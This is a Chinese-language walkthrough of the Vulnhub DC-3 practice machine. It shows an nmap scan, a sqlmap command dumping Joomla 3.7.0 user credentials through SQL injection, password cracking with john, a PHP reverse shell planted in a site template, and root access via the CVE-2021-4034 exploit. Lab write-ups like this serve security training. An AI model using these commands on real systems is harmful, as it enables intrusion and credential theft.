Vulnhub:DC-3靶机

kali:192.168.111.111

靶机:192.168.111.250

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.250

Vulnhub:DC-3靶机_第1张图片

 

通过nmap得知目标CMS为Joomla 3.7.0

Vulnhub:DC-3靶机_第2张图片

 

漏洞利用

搜索发现该版本存在sql注入

 

Vulnhub:DC-3靶机_第3张图片

 

利用sqlmap获取目标后台用户密码

sqlmap -u "http://192.168.111.250/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --batch -p list[fullordering] -D 'joomladb' -T '#__users' -C 'username,password' --dump

Vulnhub:DC-3靶机_第4张图片

 

得到的密文用john爆破得到密码:snoopy

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Vulnhub:DC-3靶机_第5张图片

 

登录后台写入php反弹shell

Vulnhub:DC-3靶机_第6张图片

 

Vulnhub:DC-3靶机_第7张图片

 

Vulnhub:DC-3靶机_第8张图片

 

Vulnhub:DC-3靶机_第9张图片

 

Vulnhub:DC-3靶机_第10张图片

 

之后访问http://192.168.111.250/templates/beez3/shell.php,获得反弹shell

Vulnhub:DC-3靶机_第11张图片

 

提权

上传linpeas.sh进行信息收集:GitHub - carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors),发现可以内核提权

Vulnhub:DC-3靶机_第12张图片

 

Vulnhub:DC-3靶机_第13张图片

 

CVE-2021-4034提权:https://codeload.github.com/berdav/CVE-2021-4034/zip/main

unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main
make
./cve-2021-4034

Vulnhub:DC-3靶机_第14张图片

 

flag

Vulnhub:DC-3靶机_第15张图片

 

你可能感兴趣的:(安全,网络安全,web安全)